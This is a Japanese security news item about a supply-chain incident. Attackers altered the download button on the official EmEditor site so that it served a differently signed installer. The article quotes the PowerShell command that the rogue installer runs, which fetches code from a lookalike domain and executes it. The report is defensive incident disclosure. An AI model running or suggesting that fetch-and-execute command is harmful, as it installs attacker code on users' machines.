EmEditor 公式サイトの「今すぐダウンロード」ボタンが改変、別組織のデジタル署名が付与されたファイルをダウンロード | ScanNetSecurity
2025.12.26(金)

EmEditor 公式サイトの「今すぐダウンロード」ボタンが改変、別組織のデジタル署名が付与されたファイルをダウンロード

 株式会社エムソフトは12月23日、EmEditor 公式サイトにおけるダウンロード導線に関するセキュリティインシデントについて発表した。

インシデント・事故
トップページ
  • トップページ
  • リリース(【重要】EmEditor インストーラーのダウンロード導線に関するセキュリティ インシデントのお知らせ)
  • リリース(事象の概要(原因の概要))
  • リリース(影響を受けないケース)
  • リリース(該当する可能性がある場合の確認方法とお願い)
  • リリース(署名または SHA-256 が一致しない場合(推奨対応))
  • リリース(現時点で確認されている挙動について)

 株式会社エムソフトは12月23日、EmEditor 公式サイトにおけるダウンロード導線に関するセキュリティインシデントについて発表した。

 これはEmEditor 公式サイトの「今すぐダウンロード」ボタンで第三者からの改変が疑われる事象を確認したというもので、2025年12月20日午前11時39分から12月23日午前5時50分に当該ボタンからダウンロードされたインストーラーについて、同社のデジタル署名が付与されていない別ファイルがダウンロードされた可能性があるという。

 同社によると、ホームページの「今すぐダウンロード」ボタンのリンク先は通常、リダイレクト(転送)設定になっているが、当該期間中、リダイレクト設定が第三者により改変された疑いがあり、本来とは異なるURLからファイルがダウンロードされる状態となっていた。

 当該ファイルは同社が作成したものではなく、現在は削除済みとなっている。また、当該ファイルには同社の署名ではなく、「WALSHAM INVESTMENTS LIMITED」という別組織のデジタル署名が付与されていることを確認している。

 同社によると、問題となる可能性のあるインストーラーは、実行時に下記のコマンドを実行しようとするが、危険なので、このコマンドを実行しないよう呼びかけている。

powershell.exe "irm emeditorjp.com | iex"

 同社では今後、原因究明と再発防止に向けて必要な対策を講じるとのこと。

《ScanNetSecurity》

関連記事

「経理」「営業」「企画」「プログラミング」「デザイン」と並ぶ、事業で成功するためのビジネスセンスが「セキュリティ」
「経理」「営業」「企画」「プログラミング」「デザイン」と並ぶ、事業で成功するためのビジネスセンスが「セキュリティ」

ページ右上「ユーザー登録」から会員登録すれば会員限定記事を閲覧できます。毎週月曜の朝、先週一週間のセキュリティ動向を総括しふりかえるメルマガをお届け。(写真:ScanNetSecurity 永世名誉編集長 りく)

×